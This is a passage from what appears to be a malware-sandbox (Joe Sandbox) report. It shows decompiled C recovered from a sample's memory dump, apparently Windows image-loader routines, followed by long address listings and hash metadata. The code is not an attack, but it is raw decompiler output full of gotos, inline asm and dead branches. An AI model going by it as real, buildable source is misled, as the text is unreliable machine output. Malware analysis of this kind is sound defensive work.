												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x115b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E010EE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x1158472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0x115b1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0x115b218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E01082280(_t250, 0x11584d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L010A3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E0107FFB0(_t293, _t353, 0x11584d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E010A37F5(_t353, 0);
																}
																E010A0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E01099B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E010902D6(_t174);
																}
																L010877F0( *0x1157b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0109C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L0107EC7F(_t353);
										L010919B8(_t287, 0, _t353, 0);
										_t200 = E0106F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0x115b2f8 |  *0x115b2fc) == 0 || ( *0x115b2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E010AB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0x115b2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E01116B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E01116AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E0107E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L0107EAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = E010A9730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E0107E9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L01078F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E010A3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}





































































































                                                                                                            0x0107d5f2
                                                                                                            0x0107d5f5
                                                                                                            0x0107d5f5
                                                                                                            0x0107d5fd
                                                                                                            0x0107d600
                                                                                                            0x0107d60a
                                                                                                            0x0107d60d
                                                                                                            0x0107d617
                                                                                                            0x0107d61d
                                                                                                            0x0107d627
                                                                                                            0x0107d62e
                                                                                                            0x0107d911
                                                                                                            0x0107d913
                                                                                                            0x00000000
                                                                                                            0x0107d919
                                                                                                            0x0107d919
                                                                                                            0x0107d919
                                                                                                            0x0107d634
                                                                                                            0x0107d634
                                                                                                            0x0107d634
                                                                                                            0x0107d634
                                                                                                            0x0107d640
                                                                                                            0x0107d8bf
                                                                                                            0x00000000
                                                                                                            0x0107d646
                                                                                                            0x0107d646
                                                                                                            0x0107d64d
                                                                                                            0x0107d652
                                                                                                            0x010cb2fc
                                                                                                            0x010cb2fc
                                                                                                            0x010cb302
                                                                                                            0x010cb33b
                                                                                                            0x010cb341
                                                                                                            0x00000000
                                                                                                            0x010cb304
                                                                                                            0x010cb304
                                                                                                            0x010cb319
                                                                                                            0x010cb31e
                                                                                                            0x010cb324
                                                                                                            0x010cb326
                                                                                                            0x010cb332
                                                                                                            0x010cb347
                                                                                                            0x010cb34c
                                                                                                            0x010cb351
                                                                                                            0x010cb35a
                                                                                                            0x00000000
                                                                                                            0x010cb328
                                                                                                            0x010cb328
                                                                                                            0x00000000
                                                                                                            0x010cb328
                                                                                                            0x010cb326
                                                                                                            0x0107d658
                                                                                                            0x0107d658
                                                                                                            0x0107d65b
                                                                                                            0x0107d665
                                                                                                            0x00000000
                                                                                                            0x0107d66b
                                                                                                            0x0107d66b
                                                                                                            0x0107d66b
                                                                                                            0x0107d66b
                                                                                                            0x0107d66d
                                                                                                            0x0107d672
                                                                                                            0x0107d67a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0107d680
                                                                                                            0x0107d686
                                                                                                            0x0107d8ce
                                                                                                            0x0107d8d4
                                                                                                            0x0107d8dd
                                                                                                            0x0107d8e0
                                                                                                            0x0107d68c
                                                                                                            0x0107d691
                                                                                                            0x0107d69d
                                                                                                            0x0107d6a2
                                                                                                            0x0107d6a7
                                                                                                            0x0107d6b0
                                                                                                            0x0107d6b5
                                                                                                            0x0107d6e0
                                                                                                            0x0107d6b7
                                                                                                            0x0107d6b7
                                                                                                            0x0107d6b9
                                                                                                            0x0107d6b9
                                                                                                            0x0107d6bb
                                                                                                            0x0107d6bd
                                                                                                            0x0107d6ce
                                                                                                            0x0107d6d0
                                                                                                            0x0107d6d2
                                                                                                            0x010cb363
                                                                                                            0x010cb365
                                                                                                            0x00000000
                                                                                                            0x010cb36b
                                                                                                            0x00000000
                                                                                                            0x010cb36b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0107d6bf
                                                                                                            0x0107d6bf
                                                                                                            0x0107d6e5
                                                                                                            0x0107d6e7
                                                                                                            0x0107d6e9
                                                                                                            0x0107d6ec
                                                                                                            0x0107d6ec
                                                                                                            0x0107d6ef
                                                                                                            0x0107d6f5
                                                                                                            0x0107d6f9
                                                                                                            0x0107d6fb
                                                                                                            0x0107d6fd
                                                                                                            0x0107d701
                                                                                                            0x0107d703
                                                                                                            0x0107d70a
                                                                                                            0x0107d70a
                                                                                                            0x0107d701
                                                                                                            0x0107d710
                                                                                                            0x0107d710
                                                                                                            0x0107d6c1
                                                                                                            0x0107d6c1
                                                                                                            0x0107d6c6
                                                                                                            0x010cb36d
                                                                                                            0x010cb36f
                                                                                                            0x00000000
                                                                                                            0x010cb375
                                                                                                            0x010cb375
                                                                                                            0x010cb375
                                                                                                            0x00000000
                                                                                                            0x010cb375
                                                                                                            0x00000000
                                                                                                            0x0107d6cc
                                                                                                            0x0107d6d8
                                                                                                            0x0107d6d8
                                                                                                            0x0107d6d8
                                                                                                            0x00000000
                                                                                                            0x0107d6c6
                                                                                                            0x0107d6bf
                                                                                                            0x00000000
                                                                                                            0x0107d6da
                                                                                                            0x0107d6da
                                                                                                            0x0107d716
                                                                                                            0x0107d71b
                                                                                                            0x0107d720
                                                                                                            0x0107d726
                                                                                                            0x0107d726
                                                                                                            0x0107d72d
                                                                                                            0x00000000
                                                                                                            0x0107d733
                                                                                                            0x0107d739
                                                                                                            0x0107d742
                                                                                                            0x0107d750
                                                                                                            0x0107d758
                                                                                                            0x0107d764
                                                                                                            0x0107d776
                                                                                                            0x0107d77a
                                                                                                            0x0107d783
                                                                                                            0x0107d928
                                                                                                            0x0107d92c
                                                                                                            0x0107d93d
                                                                                                            0x0107d944
                                                                                                            0x0107d94f
                                                                                                            0x0107d954
                                                                                                            0x0107d956
                                                                                                            0x0107d95f
                                                                                                            0x0107d961
                                                                                                            0x0107d973
                                                                                                            0x0107d973
                                                                                                            0x0107d956
                                                                                                            0x0107d944
                                                                                                            0x0107d92c
                                                                                                            0x0107d78b
                                                                                                            0x010cb394
                                                                                                            0x0107d791
                                                                                                            0x0107d798
                                                                                                            0x010cb3a3
                                                                                                            0x010cb3bb
                                                                                                            0x010cb3bb
                                                                                                            0x0107d7a5
                                                                                                            0x0107d866
                                                                                                            0x0107d870
                                                                                                            0x0107d892
                                                                                                            0x0107d898
                                                                                                            0x0107d89e
                                                                                                            0x0107d8a0
                                                                                                            0x0107d8a6
                                                                                                            0x0107d8ac
                                                                                                            0x0107d8ae
                                                                                                            0x0107d8b4
                                                                                                            0x0107d8b4
                                                                                                            0x0107d8ae
                                                                                                            0x0107d7a5
                                                                                                            0x0107d78b
                                                                                                            0x0107d7b1
                                                                                                            0x010cb3c5
                                                                                                            0x010cb3c5
                                                                                                            0x0107d7c3
                                                                                                            0x0107d7ca
                                                                                                            0x0107d7e5
                                                                                                            0x0107d7eb
                                                                                                            0x0107d8eb
                                                                                                            0x0107d8ed
                                                                                                            0x00000000
                                                                                                            0x0107d8f3
                                                                                                            0x0107d8f3
                                                                                                            0x0107d8f3
                                                                                                            0x00000000
                                                                                                            0x0107d8ed
                                                                                                            0x0107d7cc
                                                                                                            0x0107d7cc
                                                                                                            0x0107d7d2
                                                                                                            0x00000000
                                                                                                            0x0107d7d4
                                                                                                            0x0107d7d4
                                                                                                            0x0107d7d7
                                                                                                            0x0107d7df
                                                                                                            0x010cb3d4
                                                                                                            0x010cb3d9
                                                                                                            0x010cb3dc
                                                                                                            0x010cb3dc
                                                                                                            0x010cb3df
                                                                                                            0x010cb3e2
                                                                                                            0x010cb468
                                                                                                            0x010cb46d
                                                                                                            0x010cb46f
                                                                                                            0x010cb46f
                                                                                                            0x010cb475
                                                                                                            0x0107d8f8
                                                                                                            0x0107d8f9
                                                                                                            0x0107d8fd
                                                                                                            0x010cb3e8
                                                                                                            0x010cb3e8
                                                                                                            0x010cb3eb
                                                                                                            0x010cb3ed
                                                                                                            0x00000000
                                                                                                            0x010cb3ef
                                                                                                            0x010cb3ef
                                                                                                            0x010cb3f1
                                                                                                            0x010cb3f4
                                                                                                            0x010cb3fe
                                                                                                            0x010cb404
                                                                                                            0x010cb409
                                                                                                            0x010cb40e
                                                                                                            0x010cb410
                                                                                                            0x010cb410
                                                                                                            0x010cb414
                                                                                                            0x010cb414
                                                                                                            0x010cb41b
                                                                                                            0x010cb420
                                                                                                            0x010cb423
                                                                                                            0x010cb425
                                                                                                            0x010cb427
                                                                                                            0x010cb42a
                                                                                                            0x010cb42d
                                                                                                            0x010cb42d
                                                                                                            0x010cb42a
                                                                                                            0x010cb432
                                                                                                            0x010cb436
                                                                                                            0x010cb438
                                                                                                            0x010cb43b
                                                                                                            0x010cb43b
                                                                                                            0x010cb449
                                                                                                            0x010cb44e
                                                                                                            0x010cb454
                                                                                                            0x010cb458
                                                                                                            0x010cb458
                                                                                                            0x010cb45d
                                                                                                            0x00000000
                                                                                                            0x010cb45d
                                                                                                            0x010cb3ed
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0107d7df
                                                                                                            0x0107d7d2
                                                                                                            0x0107d7ca
                                                                                                            0x010cb37c
                                                                                                            0x010cb37e
                                                                                                            0x010cb385
                                                                                                            0x010cb38a
                                                                                                            0x00000000
                                                                                                            0x010cb38a
                                                                                                            0x0107d742
                                                                                                            0x0107d7f1
                                                                                                            0x0107d7f8
                                                                                                            0x010cb49b
                                                                                                            0x010cb49b
                                                                                                            0x0107d800
                                                                                                            0x0107d837
                                                                                                            0x0107d843
                                                                                                            0x0107d845
                                                                                                            0x0107d847
                                                                                                            0x0107d84a
                                                                                                            0x0107d84b
                                                                                                            0x0107d84e
                                                                                                            0x0107d857
                                                                                                            0x0107d818
                                                                                                            0x0107d824
                                                                                                            0x0107d831
                                                                                                            0x010cb4a5
                                                                                                            0x010cb4ab
                                                                                                            0x010cb4b3
                                                                                                            0x010cb4b8
                                                                                                            0x010cb4bb
                                                                                                            0x00000000
                                                                                                            0x010cb4c1
                                                                                                            0x010cb4c1
                                                                                                            0x010cb4c8
                                                                                                            0x00000000
                                                                                                            0x010cb4ce
                                                                                                            0x010cb4d4
                                                                                                            0x010cb4e1
                                                                                                            0x010cb4e3
                                                                                                            0x010cb4e5
                                                                                                            0x00000000
                                                                                                            0x010cb4eb
                                                                                                            0x010cb4f0
                                                                                                            0x010cb4f2
                                                                                                            0x0107dac9
                                                                                                            0x0107dacc
                                                                                                            0x0107dacf
                                                                                                            0x0107dad1
                                                                                                            0x0107dd78
                                                                                                            0x0107dd78
                                                                                                            0x0107dcf2
                                                                                                            0x00000000
                                                                                                            0x0107dad7
                                                                                                            0x0107dad9
                                                                                                            0x0107dadb
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0107dae1
                                                                                                            0x0107dae1
                                                                                                            0x0107dae4
                                                                                                            0x0107dae6
                                                                                                            0x010cb4f9
                                                                                                            0x010cb4f9
                                                                                                            0x010cb500
                                                                                                            0x0107daec
                                                                                                            0x0107daec
                                                                                                            0x0107daf5
                                                                                                            0x0107daf8
                                                                                                            0x0107dafb
                                                                                                            0x0107db03
                                                                                                            0x0107db11
                                                                                                            0x0107db16
                                                                                                            0x0107db19
                                                                                                            0x0107db1b
                                                                                                            0x010cb52c
                                                                                                            0x010cb531
                                                                                                            0x010cb534
                                                                                                            0x0107db21
                                                                                                            0x0107db21
                                                                                                            0x0107db24
                                                                                                            0x0107dcd9
                                                                                                            0x0107dce2
                                                                                                            0x0107dce5
                                                                                                            0x0107dd6a
                                                                                                            0x0107dd6d
                                                                                                            0x00000000
                                                                                                            0x0107dd73
                                                                                                            0x010cb51a
                                                                                                            0x010cb51c
                                                                                                            0x010cb51f
                                                                                                            0x010cb524
                                                                                                            0x00000000
                                                                                                            0x010cb524
                                                                                                            0x0107dce7
                                                                                                            0x0107dce7
                                                                                                            0x0107dce7
                                                                                                            0x00000000
                                                                                                            0x0107dce7
                                                                                                            0x00000000
                                                                                                            0x0107db2a
                                                                                                            0x0107db2c
                                                                                                            0x0107db31
                                                                                                            0x0107db33
                                                                                                            0x0107db36
                                                                                                            0x0107db39
                                                                                                            0x0107db3b
                                                                                                            0x0107db66
                                                                                                            0x0107db66
                                                                                                            0x0107db3d
                                                                                                            0x0107db3d
                                                                                                            0x0107db3e
                                                                                                            0x0107db46
                                                                                                            0x0107db47
                                                                                                            0x0107db49
                                                                                                            0x0107db4c
                                                                                                            0x0107db53
                                                                                                            0x0107db55
                                                                                                            0x0107db58
                                                                                                            0x0107db5a
                                                                                                            0x010cb50a
                                                                                                            0x010cb50f
                                                                                                            0x010cb512
                                                                                                            0x0107db60
                                                                                                            0x0107db60
                                                                                                            0x0107db63
                                                                                                            0x0107db63
                                                                                                            0x00000000
                                                                                                            0x0107db63
                                                                                                            0x0107db5a
                                                                                                            0x0107db3b
                                                                                                            0x0107db24
                                                                                                            0x0107db69
                                                                                                            0x0107db69
                                                                                                            0x0107db6c
                                                                                                            0x0107db6f
                                                                                                            0x0107db74
                                                                                                            0x010cb557
                                                                                                            0x010cb557
                                                                                                            0x010cb55e
                                                                                                            0x0107db7a
                                                                                                            0x0107db7c
                                                                                                            0x0107db7f
                                                                                                            0x0107db82
                                                                                                            0x0107db85
                                                                                                            0x00000000
                                                                                                            0x0107db8b
                                                                                                            0x0107db8b
                                                                                                            0x0107db8d
                                                                                                            0x0107db9b
                                                                                                            0x0107db9b
                                                                                                            0x0107db9d
                                                                                                            0x0107dba0
                                                                                                            0x0107dba2
                                                                                                            0x0107dba4
                                                                                                            0x0107dba7
                                                                                                            0x0107dba9
                                                                                                            0x0107dbae
                                                                                                            0x0107dbae
                                                                                                            0x0107dbb1
                                                                                                            0x0107dbb4
                                                                                                            0x0107dbb4
                                                                                                            0x0107dbb7
                                                                                                            0x0107dbba
                                                                                                            0x0107dcd2
                                                                                                            0x0107dcd4
                                                                                                            0x00000000
                                                                                                            0x0107dbc0
                                                                                                            0x0107dbc0
                                                                                                            0x0107dbd2
                                                                                                            0x0107dbd7
                                                                                                            0x0107dbda
                                                                                                            0x0107dbdd
                                                                                                            0x0107dbdf
                                                                                                            0x00000000
                                                                                                            0x0107dbe5
                                                                                                            0x0107dbe5
                                                                                                            0x0107dbee
                                                                                                            0x0107dbf1
                                                                                                            0x010cb541
                                                                                                            0x010cb544
                                                                                                            0x00000000
                                                                                                            0x010cb546
                                                                                                            0x010cb546
                                                                                                            0x00000000
                                                                                                            0x010cb546
                                                                                                            0x0107dbf7
                                                                                                            0x0107dbf7
                                                                                                            0x0107dbfd
                                                                                                            0x0107dbfd
                                                                                                            0x0107dbff
                                                                                                            0x0107dc0b
                                                                                                            0x0107dc15
                                                                                                            0x0107dc1b
                                                                                                            0x0107dc1d
                                                                                                            0x0107dc21
                                                                                                            0x0107dc21
                                                                                                            0x0107dc23
                                                                                                            0x0107dc23
                                                                                                            0x0107dc26
                                                                                                            0x0107dc29
                                                                                                            0x0107dc2b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0107dc31
                                                                                                            0x0107dc34
                                                                                                            0x0107dc36
                                                                                                            0x0107dcbf
                                                                                                            0x0107dcbf
                                                                                                            0x0107dcc2
                                                                                                            0x00000000
                                                                                                            0x0107dc3c
                                                                                                            0x0107dc41
                                                                                                            0x0107dc43
                                                                                                            0x00000000
                                                                                                            0x0107dc45
                                                                                                            0x0107dc45
                                                                                                            0x0107dc47
                                                                                                            0x00000000
                                                                                                            0x0107dc4d
                                                                                                            0x0107dc4d
                                                                                                            0x0107dc50
                                                                                                            0x0107dc52
                                                                                                            0x0107dc55
                                                                                                            0x0107dcfa
                                                                                                            0x0107dcfe
                                                                                                            0x0107dd08
                                                                                                            0x0107dd0a
                                                                                                            0x0107dd0c
                                                                                                            0x00000000
                                                                                                            0x0107dd12
                                                                                                            0x0107dd15
                                                                                                            0x0107dd2d
                                                                                                            0x0107dd2f
                                                                                                            0x0107dd32
                                                                                                            0x0107dd35
                                                                                                            0x00000000
                                                                                                            0x0107dd35
                                                                                                            0x0107dc5b
                                                                                                            0x0107dc5b
                                                                                                            0x0107dc5e
                                                                                                            0x0107dc61
                                                                                                            0x0107dc64
                                                                                                            0x0107dc67
                                                                                                            0x0107dc67
                                                                                                            0x0107dc6a
                                                                                                            0x0107dc6c
                                                                                                            0x0107dc8e
                                                                                                            0x0107dc8e
                                                                                                            0x0107dc91
                                                                                                            0x0107dc93
                                                                                                            0x0107dcce
                                                                                                            0x0107dcce
                                                                                                            0x0107dc95
                                                                                                            0x0107dc9c
                                                                                                            0x0107dc6e
                                                                                                            0x0107dc72
                                                                                                            0x0107dc75
                                                                                                            0x0107dc77
                                                                                                            0x0107dc79
                                                                                                            0x010cb551
                                                                                                            0x010cb551
                                                                                                            0x00000000
                                                                                                            0x0107dc7f
                                                                                                            0x0107dc7f
                                                                                                            0x0107dc81
                                                                                                            0x00000000
                                                                                                            0x0107dc83
                                                                                                            0x0107dc86
                                                                                                            0x0107dc88
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0107dc88
                                                                                                            0x0107dc81
                                                                                                            0x0107dc79
                                                                                                            0x0107dc6c
                                                                                                            0x0107dc55
                                                                                                            0x0107dc47
                                                                                                            0x0107dc43
                                                                                                            0x00000000
                                                                                                            0x0107dc36
                                                                                                            0x0107dc23
                                                                                                            0x00000000
                                                                                                            0x0107dbff
                                                                                                            0x0107dbf1
                                                                                                            0x0107dbdf
                                                                                                            0x0107db8f
                                                                                                            0x0107db92
                                                                                                            0x0107db95
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0107db95
                                                                                                            0x0107db8d
                                                                                                            0x0107db85
                                                                                                            0x0107db74
                                                                                                            0x0107dc9f
                                                                                                            0x0107dca2
                                                                                                            0x0107dcb0
                                                                                                            0x0107dcb0
                                                                                                            0x0107dad1
                                                                                                            0x010cb4e5
                                                                                                            0x010cb4c8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0107d831
                                                                                                            0x00000000
                                                                                                            0x0107d800
                                                                                                            0x010cb47f
                                                                                                            0x010cb485
                                                                                                            0x00000000
                                                                                                            0x010cb485
                                                                                                            0x0107d665
                                                                                                            0x0107d652
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 267c2504cd26594277672c64d8bee49b3a223b66d36cd8a9eb40b0aa0ddd8d01
                                                                                                            • Instruction ID: 70105d80e9db662b430589e796736787d993e5c18475334b86c7caf249c52ccb
                                                                                                            • Opcode Fuzzy Hash: 267c2504cd26594277672c64d8bee49b3a223b66d36cd8a9eb40b0aa0ddd8d01
                                                                                                            • Instruction Fuzzy Hash: 54E1DF30E0435ACFEB659F68C880BADBBF2BF45704F0441E9D9899B291DB30A981CF55
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0107849B Relevance: .3, Instructions: 290COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 92%
                                                                                                            			E0107849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x113f9c0);
				E010BD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x1157b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E0107CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
